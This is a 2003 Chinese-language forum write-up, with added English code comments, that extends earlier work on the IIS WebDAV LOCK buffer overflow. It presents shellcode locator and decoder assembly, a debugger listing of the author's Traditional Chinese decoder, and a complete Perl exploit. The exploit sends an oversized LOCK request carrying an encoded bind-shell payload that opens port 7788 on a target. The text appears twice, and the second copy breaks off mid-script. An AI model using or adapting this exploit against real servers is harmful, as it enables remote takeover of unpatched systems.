创建时间:2003-04-07
文章属性:原创
文章来源:Nanika@seed.net.tw minjack.tw@yahoo.com.tw
文章提交: Nanika (minjack.tw_at_yahoo.com.tw)
Webdav漏洞ISNO方法的补充~~
作者:Nanika
首先必须先感谢ISNO的指导,和袁哥的文章,我把我研究的结果,跟大家报告一下。
ISNO的方法很好,他把真正绑定Port的shellcode放在最后
# Quoted from ISNO's exploit: the same LOCK request as in the script at the
# end of this write-up, but here the request body (Content-length 808) carries
# the real port-binding shellcode after the YXYX tag, and the code placed in
# the URI has to find it in memory first (see the search stub quoted next).
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 808/r/n/r/n";
print $socket "$tag$shell/r/n";
然后利用袁哥所写的 http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
把ISNO所写的
; ISNO's locator stub, as quoted by the author: walk memory forward from esi
; until a 4-byte "NNNN" is seen, then byte-scan for the "YXYX" marker and
; jump to whatever follows it.  There is no bound check: if neither pattern
; is found the reads presumably run off mapped memory and the process faults.
add esi, 1000h
jmp loadmem
lookupN:
add esi, 4000h
loadmem:
mov eax, [esi]
cmp eax, 4e4e4e4eh ;look for memory holding "NNNN" (4eh = 'N') in 4000h steps, to speed up the search
jnz lookupN
add esi, 4
lookupYXYX:
mov al, byte ptr [esi]
inc esi
cmp al, 59h ;then scan for "YXYX", the marker placed in front of the shellcode to locate it ('Y' = 59h)
jnz lookupYXYX
mov al, byte ptr [esi]
inc esi
cmp al, 58h ;'X' = 58h
jnz lookupYXYX
lodsw
cmp ax, 0x5859 ;the second "YX" read as one little-endian word
jnz lookupYXYX
jmp esi ;once found, jump to the shellcode that follows the marker
这一段编码
但我们还需要一段译码的程序
袁哥所写的
对shellcode解码代码的汇编代码：
/*
 * yuange's generic decoder stub, quoted by the author (MSVC inline asm).
 * Starting from esi = ebx it scans forward one 16-bit unit at a time for the
 * marker word 0x6099 (the _emit(0x99) _emit(0x60) bytes at the end of this
 * very function), then decodes the letter-encoded bytes that follow the
 * marker in place and returns into the decoded code.  DATABASE (the base
 * letter) and NOPCODE (the terminator word) are macros defined outside this
 * excerpt; the _Nanikalock2 listing further down uses 61h and 004Fh in those
 * roles.  The author reports this stub does not decode correctly on the
 * Traditional Chinese build, which is why _Nanikalock2 exists.
 */
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
unlockdataw:
nop
push ebx
/* push esp can be used here instead, for generality */
pop esi
loopload:
lodsw
cmp ax,0x6099 // SHELLDATA: the marker word, see the _emit() bytes at the end
jnz loopload
push esi
push esi
push esi
pop edi // edi = esi: decode in place; two copies of esi stay on the stack for toshell
looplock: lodsw
cmp ax,NOPCODE // terminator word reached -> run the decoded code
jz toshell
nop
sub al,DATABASE // first letter -> high nibble
nop
push eax
pop ecx
lodsw
nop
sub al,DATABASE // second letter -> low nibble
lea edx,dword ptr [eax+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
lea edx,dword ptr [edx+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
push edx
pop eax
/*
temp=shellcodefnadd[j];
buff[OVERADD+offset+2*j]=DATABASE+temp/0x10;
buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10;
This is the inverse of that encoding, but on 16-bit units here:
0xa*0x10+0xb = 0xab.  The four lea's add ecx*4 each (the +0x70/-0x70
cancel), i.e. edx = eax + 16*ecx; the roundabout form is there, per the
original note, to keep every instruction byte inside the allowed range.
*/
stosb // only al is stored, so stray upper bits of eax/ecx are harmless
jz looplock // unconditional loop written as a jz/jnz pair
jnz looplock
nop
toshell: pop eax // eax = saved esi, the start of the decoded bytes
push eax
push eax
push eax
ret // jump into the decoded code
nop
_emit(0x99) // marker word 0x6099, low byte first
_emit(0x60)
_emit(0x0)
_emit(0x0)
_emit(0x0)
_emit(0x0)
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
但是~~我在测试时发现~~这一段在繁体中文版中~~没有办法通用~~
有很多字符没有办法正确地解码
于是我花了很多时间~~写了一个~~繁体中文版的译码程序
; _Nanikalock2: the author's replacement decoder, shown as a debugger listing
; (address, bytes, mnemonic).  It is the machine code carried by $decode in
; the Perl script below: %u5e53 = 53 5E, %u6690%uebad = 90 66 AD, and so on.
; On the two cmp lines the debugger mislabels a 16-bit immediate as an
; "offset"; the bytes 58 59 and 4F 00 give the real operands 5958h and 004Fh.
; Flow, entirely on 16-bit units (lodsw):
;   1. esi = ebx; scan forward until ax == 5958h (the word that ends $decode).
;   2. edi = esi, so decoding happens in place.  Read one word: if it is
;      004Fh (the "O" filler, seen as a UTF-16 unit) jump to the decoded code;
;      otherwise sub 61h ('a') -> high nibble into ecx, read the next word,
;      sub 61h -> low nibble, and the four lea's give edx = low + 16*high
;      (the +70h/-70h cancel).  stosb stores al only.
;   3. loop back to 00421BAF via the je/jmp pair at 00421BE5/00421BE7.
; The nops and the jmp-over-nop pairs are byte-level padding (the author's
; "keep within instruction range"); they do no work.
_Nanikalock2:
00421B9C 53 push ebx
00421B9D 5E pop esi
00421B9E 90 nop
00421B9F 66 AD lods word ptr [esi] ; marker search loop
00421BA1 EB 01 jmp _Nanikalock2+8 (00421ba4)
00421BA3 90 nop
00421BA4 90 nop
00421BA5 66 3D 58 59 cmp ax,offset _Nanikalock2+0Bh (00421ba7) ; really cmp ax,5958h
00421BA9 75 F4 jne _Nanikalock2+3 (00421b9f)
00421BAB 90 nop
00421BAC 56 push esi
00421BAD 5F pop edi ; edi = esi: decode in place
00421BAE 90 nop
00421BAF 66 AD lods word ptr [esi] ; decode loop: first letter
00421BB1 EB 01 jmp _Nanikalock2+18h (00421bb4)
00421BB3 90 nop
00421BB4 90 nop
00421BB5 66 3D 4F 00 cmp ax,offset _Nanikalock2+1Bh (00421bb7) ; really cmp ax,004Fh (the "O" stop word)
00421BB9 74 3C je _Nanikalock2+5Bh (00421bf7)
00421BBB 90 nop
00421BBC 2C 61 sub al,61h ; 'a' -> 0 : high nibble
00421BBE 50 push eax
00421BBF 59 pop ecx
00421BC0 90 nop
00421BC1 66 AD lods word ptr [esi] ; second letter
00421BC3 EB 01 jmp _Nanikalock2+2Ah (00421bc6)
00421BC5 90 nop
00421BC6 2C 61 sub al,61h ; low nibble
00421BC8 50 push eax
00421BC9 5A pop edx
00421BCA 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BCE 8D 54 8A 90 lea edx,[edx+ecx*4-70h]
00421BD2 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BD6 8D 54 8A 90 lea edx,[edx+ecx*4-70h] ; edx = low + 16*high
00421BDA 52 push edx
00421BDB 58 pop eax
00421BDC AA stos byte ptr [edi] ; write the decoded byte
00421BDD 51 push ecx
00421BDE 90 nop
00421BDF 59 pop ecx
00421BE0 90 nop
00421BE1 90 nop
00421BE2 90 nop
00421BE3 90 nop
00421BE4 90 nop
00421BE5 74 C8 je _Nanikalock2+13h (00421baf) ; loop, written as je + jmp
00421BE7 EB C6 jmp _Nanikalock2+13h (00421baf)
00421BE9 EB 01 jmp _Nanikalock2+50h (00421bec)
00421BEB 90 nop
00421BEC 90 nop
00421BED 90 nop
00421BEE 90 nop
00421BEF 90 nop
00421BF0 90 nop
00421BF1 90 nop
00421BF2 90 nop
00421BF3 90 nop
00421BF4 90 nop
00421BF5 90 nop
00421BF6 90 nop
00421BF7 90 nop ; je target from 00421BB9
00421BF8 90 nop
00421BF9 EB 05 jmp _Nanikalock2+64h (00421c00) ; past the end of the stub, presumably into the decoded bytes
00421BFB 90 nop
00421BFC 90 nop
00421BFD 90 nop
00421BFE 58 pop eax
00421BFF 59 pop ecx
这一段的程序~~是利用袁哥所写的构想~~
经过我的测试~~繁体中文或是简体中文~也可以省略那一段搜索SHELLCODE的程序~~
我们可以直接~~利用袁哥的编码~~把绑定cmd的shellcode编码~~
然后建构在译码程序之后~~~
详细请参考最后的Exploit~~
我觉得现在大家所发出来的EXPLOIT都没有办法可以很有效的通用~~
原因在于编码方式的不同~~和SHELLCODE定位困难~等等问题~~
我只是初学者~~写这篇的目的~~希望可以抛砖引玉~~让各位高手~~可以研究出~~通用在各种版本的利用方法~~
繁体中文版的
exploit
#!/usr/bin/perl
#use call ebx as the ret
#test on Chinese Big5 Win2k sp3
#by Nanika@seed.net.tw minjack.tw@yahoo.com.tw
#thanks isno,yuange
#
# Proof-of-concept sender for the 2003 IIS WebDAV overflow discussed above,
# as published (Big5 Win2k SP3 build).  It opens one TCP connection to port
# 80, writes a single WebDAV LOCK request whose request-URI is roughly 65 KB
# long, prints a few status lines and closes; the response is never read.
#
# What a defender sees on the wire: an HTTP LOCK whose URI is a run of "A",
# eight copies of a %uXXXX return-address group, a ~116-byte %uXXXX decoder
# stub, 1608 lowercase letters (the encoded payload) and ~63 KB of "O".  The
# script's own final message says a successful run leaves a listener on
# TCP 7788 on the target.
#
# NOTE(review): kept byte-identical -- no strict/warnings, package globals,
# and every line ending is written as the literal characters "/r/n" ("/n")
# exactly as transcribed.  Only comments were added.
use IO::Socket;
# Two positional arguments are required: target IP and an alignment offset 0..7.
if ($#ARGV<1){die "webdavx.pl IP offset/r/noffset: 0-7/r/n";}
$host = @ARGV[0];   # one-element array slice; yields the first argument
$port = 80;
$offset = @ARGV[1]; # added to the "A" padding length below
# $decode: the decoder stub from the _Nanikalock2 listing above, as %uXXXX
# groups.  Each group is one 16-bit value whose low byte comes first in
# memory (%u5e53 = 53 5E, the listing's "push ebx / pop esi").  The eight
# leading %u9090 groups are nops; the closing %u5958 is the marker word the
# stub scans for (cmp ax,5958h), placed right before $sc so that decoding
# starts at the first letter of $sc.
$decode =
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090".
"%u5e53%u6690%uebad%u9001%u6690%u583d%u7559%u90f4".
"%u5f56%u6690%uebad%u9001%u6690%u4f3d%u7400%u903c".
"%u612c%u5950%u6690%uebad%u9001%u612c%u5a50%u548d".
"%u708a%u548d%u908a%u548d%u708a%u548d%u908a%u5852".
"%u51aa".
#decoder code
#66 bytes: the 33 groups from %u5e53 to %u51aa (listing 00421B9C-00421BDD);
#the 17 groups below are the loop-back/jump-over-padding tail plus the marker
"%u5990%u9090%u9090%u7490%uebc8%uebc6%u0590%u9090".
"%u9090%u9090%u9090%u9090%u9090%ueb90%u9005%u9090".
"%u5958";
# $sc: the bind-shell payload in the letter encoding the stub undoes.  The
# stub reads 16-bit units and subtracts 61h ('a'), so each letter a..p
# carries one nibble and two letters make one byte (high*16+low via the
# four lea's); it stops at the first 004Fh word, i.e. the "O" filler of
# $buf.  Working on 16-bit units and matching 004Fh for "O" is consistent
# with the server holding the decoded URI as UTF-16 (ASCII char -> XX 00,
# %uXXXX -> the raw word); that is the author's premise, not something the
# script checks.
$sc =
"jaoladfnolafoipippppppidmfbfjajajailmfddmjggljbaadfaiadajheaocpk".
"hoiojfjhjhmnbmenbehmjapngimepddgjhjhjhjhmhpdbolcjhjhjhjhkeemcmjh".
"jhhhoahpeljgjhjhbggmjhjhgicijibefjjgjhjhbgfejhjhjgjhpbbgkmnkmnoc".
"hakefhbmnekljefepbbgkpmhncoceobefhopbmkhjegebmnjjljefmbgkonmncmf".
"njocfcbgoojdncnlkekfocclkegibmnblhjefebmfmjejpbgkonapcodmhocjobg".
"oojdofpipengodjbnabefhjdhmhcjegijegmbmmbldjegnkeefpbbmiabmgnbmnb".
"ihnpjegpkefobmfijefojefojenjiljefmbmkojegmhopojgjhjhmjbagabmeake".
"fhgaehbmfpgfdibokfbknfjpmfmhmegiifmnbonfjdbkoficmfmbgimfjdmnkefh".
"dlbdfhocgokefobnjjbdfoodjomfmbmegiifmndmhfhpnbmfmbgimfjdmnbmepke".
"fhdlbdfhocgokefobnjjbhgojfodjomfmbmegiifmndmhfhakefhmhnhmhnhmhgi".
"mahpaepnihmbmegimahlpnjfmegimaghkefhmamhchjldmmpdmnhdmminpmhmamb".
"dkmbgimafhnpmhmadkmbdkmbgimafhnpchndbojamagimafdkefhbmnbgdbonakl".
"bonanhbmjbbonakpkefhpbcpjgjgbonallmamakefhmhmhmhnhmhnpmhmhdkmbke".
"fhmhgimafpgiobghgimaflgiobglgimaflnpmhmhmegimagdbmepkefhcdjdmhfg".
"hpjdmhgimaedbmghkefhbmfpccjdmhmhmamgmbgioadpgimaehbekijgollfkefh".
"mhmagikambgioadpgimaeljmfhodlikefhmhgikambmegimagppnmhgimahhhmfp".
"kefhmhcdjdmhmbmegimaglmakefomgmhmbgioadlgimaeppnmhgimahhhmdnmhgi".
"mahdhmgjmpmhbonfgffebmndldjljccpjhjhjhfajhopmbkdifkefhfehmhlhphf".
"gkgigihpafgjgiginmmbhaoalebhhaoanlpipgpdnlpopfofpgofoongjhnmncmf".
"njncnlkekfjhneofpcpgodpcmhpoohpcjhnapcodmeodpgofodocohnopjpbping".
"jhneofpcpgodpcmhofpipepcoeoengjhneplpioepcnppgpjpdplpcjhmhpcpcpm".
"njpgpkpcpdmhpoohpcjhnaplpipfpgplngplplpipejhmaofpoodpcnbpoplpcjh".
"mfpcpgpdnbpoplpcjhmeplpcpcohjhncoppoodmhofpipepcoeoejhjhmamenine".
"nmkekfjhoepipepmpcodjhpfpopjpdjhplpooeodpcpjjhpgpepepcohodjhoepc".
"pjpdjhofpcpeobjhjfjhijpljhjhjhjhjhjhjhjhjhjhjhjhpepkpdljpcoppcjh".
"gigigigi";
#code to find the real shellcode -- heading apparently left over from ISNO's
#version; as the write-up says, the YXYX search stub is dropped here and $sc
#above is the encoded payload itself
#1608 bytes (25 lines x 64 + 8)
$num = 266+$offset;  # length of the "A" padding that precedes $ret
$bf = "A" x $num;
$ret = "%u6e53%ueb06%ueb06%u2191" x 8; #call ebx addr 0x6e532191 -- author's note: a "call ebx" in the tested Big5 Win2k SP3 build; the group is repeated 8 times, presumably so that one copy lands on the return slot whatever $offset is
$n = 63549;
$buf = "O" x $n;    # filler; its first "O" is also the decoder's stop word (004Fh)
$tag = "YXYX";
$shell ="AAAA";     # 8-byte request body "YXYXAAAA"; the YXYX tag only mattered to ISNO's search stub, which this version no longer sends
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!/n";
# NOTE(review): "@!" above interpolates an (empty) array, not the $! error text, so a failed connect dies without a reason.
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";   # the entire payload travels in the request-URI
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 8/r/n/r/n";
print $socket "$tag$shell/r/n";
print "send buffer.../r/n";
print "telnet target 7788/r/n";   # the payload's listening port, per the author
print "if fail, try other offset(0-7)/r/n";
print "test on Chinese Big5 Win2k sp3/r/n";
print "by Nanika@seed.net.tw minjack.tw@yahoo.com.tw/r/n";
print "thanks isno, yuange/r/n";
close($socket);   # nothing is read back from the server
若是失败~~可以调整offset~~或是更改call ebx的地址
文章属性:原创
文章来源:Nanika@seed.net.tw minjack.tw@yahoo.com.tw
文章提交: Nanika (minjack.tw_at_yahoo.com.tw)
Webdav漏洞ISNO方法的补充~~
作者:Nanika
首先必须先感谢ISNO的指导,和袁哥的文章,我把我研究的结果,跟大家报告一下。
ISNO的方法很好,他把真正绑定Port的shellcode放在最后
# Quoted from ISNO's exploit: the same LOCK request as in the script at the
# end of this write-up, but here the request body (Content-length 808) carries
# the real port-binding shellcode after the YXYX tag, and the code placed in
# the URI has to find it in memory first (see the search stub quoted next).
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 808/r/n/r/n";
print $socket "$tag$shell/r/n";
然后利用袁哥所写的 http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646
把ISNO所写的
; ISNO's locator stub, as quoted by the author: walk memory forward from esi
; until a 4-byte "NNNN" is seen, then byte-scan for the "YXYX" marker and
; jump to whatever follows it.  There is no bound check: if neither pattern
; is found the reads presumably run off mapped memory and the process faults.
add esi, 1000h
jmp loadmem
lookupN:
add esi, 4000h
loadmem:
mov eax, [esi]
cmp eax, 4e4e4e4eh ;look for memory holding "NNNN" (4eh = 'N') in 4000h steps, to speed up the search
jnz lookupN
add esi, 4
lookupYXYX:
mov al, byte ptr [esi]
inc esi
cmp al, 59h ;then scan for "YXYX", the marker placed in front of the shellcode to locate it ('Y' = 59h)
jnz lookupYXYX
mov al, byte ptr [esi]
inc esi
cmp al, 58h ;'X' = 58h
jnz lookupYXYX
lodsw
cmp ax, 0x5859 ;the second "YX" read as one little-endian word
jnz lookupYXYX
jmp esi ;once found, jump to the shellcode that follows the marker
这一段编码
但我们还需要一段译码的程序
袁哥所写的
对shellcode解码代码的汇编代码：
/*
 * yuange's generic decoder stub, quoted by the author (MSVC inline asm).
 * Starting from esi = ebx it scans forward one 16-bit unit at a time for the
 * marker word 0x6099 (the _emit(0x99) _emit(0x60) bytes at the end of this
 * very function), then decodes the letter-encoded bytes that follow the
 * marker in place and returns into the decoded code.  DATABASE (the base
 * letter) and NOPCODE (the terminator word) are macros defined outside this
 * excerpt; the _Nanikalock2 listing further down uses 61h and 004Fh in those
 * roles.  The author reports this stub does not decode correctly on the
 * Traditional Chinese build, which is why _Nanikalock2 exists.
 */
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
unlockdataw:
nop
push ebx
/* push esp can be used here instead, for generality */
pop esi
loopload:
lodsw
cmp ax,0x6099 // SHELLDATA: the marker word, see the _emit() bytes at the end
jnz loopload
push esi
push esi
push esi
pop edi // edi = esi: decode in place; two copies of esi stay on the stack for toshell
looplock: lodsw
cmp ax,NOPCODE // terminator word reached -> run the decoded code
jz toshell
nop
sub al,DATABASE // first letter -> high nibble
nop
push eax
pop ecx
lodsw
nop
sub al,DATABASE // second letter -> low nibble
lea edx,dword ptr [eax+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
lea edx,dword ptr [edx+ecx*4+0x70]
lea edx,dword ptr [edx+ecx*4-0x70]
push edx
pop eax
/*
temp=shellcodefnadd[j];
buff[OVERADD+offset+2*j]=DATABASE+temp/0x10;
buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10;
This is the inverse of that encoding, but on 16-bit units here:
0xa*0x10+0xb = 0xab.  The four lea's add ecx*4 each (the +0x70/-0x70
cancel), i.e. edx = eax + 16*ecx; the roundabout form is there, per the
original note, to keep every instruction byte inside the allowed range.
*/
stosb // only al is stored, so stray upper bits of eax/ecx are harmless
jz looplock // unconditional loop written as a jz/jnz pair
jnz looplock
nop
toshell: pop eax // eax = saved esi, the start of the decoded bytes
push eax
push eax
push eax
ret // jump into the decoded code
nop
_emit(0x99) // marker word 0x6099, low byte first
_emit(0x60)
_emit(0x0)
_emit(0x0)
_emit(0x0)
_emit(0x0)
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
但是~~我在测试时发现~~这一段在繁体中文版中~~没有办法通用~~
有很多字符没有办法正确地解码
于是我花了很多时间~~写了一个~~繁体中文版的译码程序
; _Nanikalock2: the author's replacement decoder, shown as a debugger listing
; (address, bytes, mnemonic).  It is the machine code carried by $decode in
; the Perl script below: %u5e53 = 53 5E, %u6690%uebad = 90 66 AD, and so on.
; On the two cmp lines the debugger mislabels a 16-bit immediate as an
; "offset"; the bytes 58 59 and 4F 00 give the real operands 5958h and 004Fh.
; Flow, entirely on 16-bit units (lodsw):
;   1. esi = ebx; scan forward until ax == 5958h (the word that ends $decode).
;   2. edi = esi, so decoding happens in place.  Read one word: if it is
;      004Fh (the "O" filler, seen as a UTF-16 unit) jump to the decoded code;
;      otherwise sub 61h ('a') -> high nibble into ecx, read the next word,
;      sub 61h -> low nibble, and the four lea's give edx = low + 16*high
;      (the +70h/-70h cancel).  stosb stores al only.
;   3. loop back to 00421BAF via the je/jmp pair at 00421BE5/00421BE7.
; The nops and the jmp-over-nop pairs are byte-level padding (the author's
; "keep within instruction range"); they do no work.
_Nanikalock2:
00421B9C 53 push ebx
00421B9D 5E pop esi
00421B9E 90 nop
00421B9F 66 AD lods word ptr [esi] ; marker search loop
00421BA1 EB 01 jmp _Nanikalock2+8 (00421ba4)
00421BA3 90 nop
00421BA4 90 nop
00421BA5 66 3D 58 59 cmp ax,offset _Nanikalock2+0Bh (00421ba7) ; really cmp ax,5958h
00421BA9 75 F4 jne _Nanikalock2+3 (00421b9f)
00421BAB 90 nop
00421BAC 56 push esi
00421BAD 5F pop edi ; edi = esi: decode in place
00421BAE 90 nop
00421BAF 66 AD lods word ptr [esi] ; decode loop: first letter
00421BB1 EB 01 jmp _Nanikalock2+18h (00421bb4)
00421BB3 90 nop
00421BB4 90 nop
00421BB5 66 3D 4F 00 cmp ax,offset _Nanikalock2+1Bh (00421bb7) ; really cmp ax,004Fh (the "O" stop word)
00421BB9 74 3C je _Nanikalock2+5Bh (00421bf7)
00421BBB 90 nop
00421BBC 2C 61 sub al,61h ; 'a' -> 0 : high nibble
00421BBE 50 push eax
00421BBF 59 pop ecx
00421BC0 90 nop
00421BC1 66 AD lods word ptr [esi] ; second letter
00421BC3 EB 01 jmp _Nanikalock2+2Ah (00421bc6)
00421BC5 90 nop
00421BC6 2C 61 sub al,61h ; low nibble
00421BC8 50 push eax
00421BC9 5A pop edx
00421BCA 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BCE 8D 54 8A 90 lea edx,[edx+ecx*4-70h]
00421BD2 8D 54 8A 70 lea edx,[edx+ecx*4+70h]
00421BD6 8D 54 8A 90 lea edx,[edx+ecx*4-70h] ; edx = low + 16*high
00421BDA 52 push edx
00421BDB 58 pop eax
00421BDC AA stos byte ptr [edi] ; write the decoded byte
00421BDD 51 push ecx
00421BDE 90 nop
00421BDF 59 pop ecx
00421BE0 90 nop
00421BE1 90 nop
00421BE2 90 nop
00421BE3 90 nop
00421BE4 90 nop
00421BE5 74 C8 je _Nanikalock2+13h (00421baf) ; loop, written as je + jmp
00421BE7 EB C6 jmp _Nanikalock2+13h (00421baf)
00421BE9 EB 01 jmp _Nanikalock2+50h (00421bec)
00421BEB 90 nop
00421BEC 90 nop
00421BED 90 nop
00421BEE 90 nop
00421BEF 90 nop
00421BF0 90 nop
00421BF1 90 nop
00421BF2 90 nop
00421BF3 90 nop
00421BF4 90 nop
00421BF5 90 nop
00421BF6 90 nop
00421BF7 90 nop ; je target from 00421BB9
00421BF8 90 nop
00421BF9 EB 05 jmp _Nanikalock2+64h (00421c00) ; past the end of the stub, presumably into the decoded bytes
00421BFB 90 nop
00421BFC 90 nop
00421BFD 90 nop
00421BFE 58 pop eax
00421BFF 59 pop ecx
这一段的程序~~是利用袁哥所写的构想~~
经过我的测试~~繁体中文或是简体中文~也可以省略那一段搜索SHELLCODE的程序~~
我们可以直接~~利用袁哥的编码~~把绑定cmd的shellcode编码~~
然后建构在译码程序之后~~~
详细请参考最后的Exploit~~
我觉得现在大家所发出来的EXPLOIT都没有办法可以很有效的通用~~
原因在于编码方式的不同~~和SHELLCODE定位困难~等等问题~~
我只是初学者~~写这篇的目的~~希望可以抛砖引玉~~让各位高手~~可以研究出~~通用在各种版本的利用方法~~
繁体中文版的
exploit
#!/usr/bin/perl
#use call ebx as the ret
#test on Chinese Big5 Win2k sp3
#by Nanika@seed.net.tw minjack.tw@yahoo.com.tw
#thanks isno,yuange
#
# Proof-of-concept sender for the 2003 IIS WebDAV overflow discussed above,
# as published (Big5 Win2k SP3 build).  It opens one TCP connection to port
# 80, writes a single WebDAV LOCK request whose request-URI is roughly 65 KB
# long, prints a few status lines and closes; the response is never read.
#
# What a defender sees on the wire: an HTTP LOCK whose URI is a run of "A",
# eight copies of a %uXXXX return-address group, a ~116-byte %uXXXX decoder
# stub, 1608 lowercase letters (the encoded payload) and ~63 KB of "O".  The
# script's own final message says a successful run leaves a listener on
# TCP 7788 on the target.
#
# NOTE(review): kept byte-identical -- no strict/warnings, package globals,
# and every line ending is written as the literal characters "/r/n" ("/n")
# exactly as transcribed.  Only comments were added.
use IO::Socket;
# Two positional arguments are required: target IP and an alignment offset 0..7.
if ($#ARGV<1){die "webdavx.pl IP offset/r/noffset: 0-7/r/n";}
$host = @ARGV[0];   # one-element array slice; yields the first argument
$port = 80;
$offset = @ARGV[1]; # added to the "A" padding length below
# $decode: the decoder stub from the _Nanikalock2 listing above, as %uXXXX
# groups.  Each group is one 16-bit value whose low byte comes first in
# memory (%u5e53 = 53 5E, the listing's "push ebx / pop esi").  The eight
# leading %u9090 groups are nops; the closing %u5958 is the marker word the
# stub scans for (cmp ax,5958h), placed right before $sc so that decoding
# starts at the first letter of $sc.
$decode =
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090".
"%u5e53%u6690%uebad%u9001%u6690%u583d%u7559%u90f4".
"%u5f56%u6690%uebad%u9001%u6690%u4f3d%u7400%u903c".
"%u612c%u5950%u6690%uebad%u9001%u612c%u5a50%u548d".
"%u708a%u548d%u908a%u548d%u708a%u548d%u908a%u5852".
"%u51aa".
#decoder code
#66 bytes: the 33 groups from %u5e53 to %u51aa (listing 00421B9C-00421BDD);
#the 17 groups below are the loop-back/jump-over-padding tail plus the marker
"%u5990%u9090%u9090%u7490%uebc8%uebc6%u0590%u9090".
"%u9090%u9090%u9090%u9090%u9090%ueb90%u9005%u9090".
"%u5958";
# $sc: the bind-shell payload in the letter encoding the stub undoes.  The
# stub reads 16-bit units and subtracts 61h ('a'), so each letter a..p
# carries one nibble and two letters make one byte (high*16+low via the
# four lea's); it stops at the first 004Fh word, i.e. the "O" filler of
# $buf.  Working on 16-bit units and matching 004Fh for "O" is consistent
# with the server holding the decoded URI as UTF-16 (ASCII char -> XX 00,
# %uXXXX -> the raw word); that is the author's premise, not something the
# script checks.
$sc =
"jaoladfnolafoipippppppidmfbfjajajailmfddmjggljbaadfaiadajheaocpk".
"hoiojfjhjhmnbmenbehmjapngimepddgjhjhjhjhmhpdbolcjhjhjhjhkeemcmjh".
"jhhhoahpeljgjhjhbggmjhjhgicijibefjjgjhjhbgfejhjhjgjhpbbgkmnkmnoc".
"hakefhbmnekljefepbbgkpmhncoceobefhopbmkhjegebmnjjljefmbgkonmncmf".
"njocfcbgoojdncnlkekfocclkegibmnblhjefebmfmjejpbgkonapcodmhocjobg".
"oojdofpipengodjbnabefhjdhmhcjegijegmbmmbldjegnkeefpbbmiabmgnbmnb".
"ihnpjegpkefobmfijefojefojenjiljefmbmkojegmhopojgjhjhmjbagabmeake".
"fhgaehbmfpgfdibokfbknfjpmfmhmegiifmnbonfjdbkoficmfmbgimfjdmnkefh".
"dlbdfhocgokefobnjjbdfoodjomfmbmegiifmndmhfhpnbmfmbgimfjdmnbmepke".
"fhdlbdfhocgokefobnjjbhgojfodjomfmbmegiifmndmhfhakefhmhnhmhnhmhgi".
"mahpaepnihmbmegimahlpnjfmegimaghkefhmamhchjldmmpdmnhdmminpmhmamb".
"dkmbgimafhnpmhmadkmbdkmbgimafhnpchndbojamagimafdkefhbmnbgdbonakl".
"bonanhbmjbbonakpkefhpbcpjgjgbonallmamakefhmhmhmhnhmhnpmhmhdkmbke".
"fhmhgimafpgiobghgimaflgiobglgimaflnpmhmhmegimagdbmepkefhcdjdmhfg".
"hpjdmhgimaedbmghkefhbmfpccjdmhmhmamgmbgioadpgimaehbekijgollfkefh".
"mhmagikambgioadpgimaeljmfhodlikefhmhgikambmegimagppnmhgimahhhmfp".
"kefhmhcdjdmhmbmegimaglmakefomgmhmbgioadlgimaeppnmhgimahhhmdnmhgi".
"mahdhmgjmpmhbonfgffebmndldjljccpjhjhjhfajhopmbkdifkefhfehmhlhphf".
"gkgigihpafgjgiginmmbhaoalebhhaoanlpipgpdnlpopfofpgofoongjhnmncmf".
"njncnlkekfjhneofpcpgodpcmhpoohpcjhnapcodmeodpgofodocohnopjpbping".
"jhneofpcpgodpcmhofpipepcoeoengjhneplpioepcnppgpjpdplpcjhmhpcpcpm".
"njpgpkpcpdmhpoohpcjhnaplpipfpgplngplplpipejhmaofpoodpcnbpoplpcjh".
"mfpcpgpdnbpoplpcjhmeplpcpcohjhncoppoodmhofpipepcoeoejhjhmamenine".
"nmkekfjhoepipepmpcodjhpfpopjpdjhplpooeodpcpjjhpgpepepcohodjhoepc".
"pjpdjhofpcpeobjhjfjhijpljhjhjhjhjhjhjhjhjhjhjhjhpepkpdljpcoppcjh".
"gigigigi";
#code to find the real shellcode -- heading apparently left over from ISNO's
#version; as the write-up says, the YXYX search stub is dropped here and $sc
#above is the encoded payload itself
#1608 bytes (25 lines x 64 + 8)
$num = 266+$offset;  # length of the "A" padding that precedes $ret
$bf = "A" x $num;
$ret = "%u6e53%ueb06%ueb06%u2191" x 8; #call ebx addr 0x6e532191 -- author's note: a "call ebx" in the tested Big5 Win2k SP3 build; the group is repeated 8 times, presumably so that one copy lands on the return slot whatever $offset is
$n = 63549;
$buf = "O" x $n;    # filler; its first "O" is also the decoder's stop word (004Fh)
$tag = "YXYX";
$shell ="AAAA";     # 8-byte request body "YXYXAAAA"; the YXYX tag only mattered to ISNO's search stub, which this version no longer sends
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!/n";
# NOTE(review): "@!" above interpolates an (empty) array, not the $! error text, so a failed connect dies without a reason.
print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1/r/n";   # the entire payload travels in the request-URI
print $socket "Host: $host/r/n";
print $socket "Content-Type: text/xml/r/n";
print $socket "Content-length: 8/r/n/r/n";
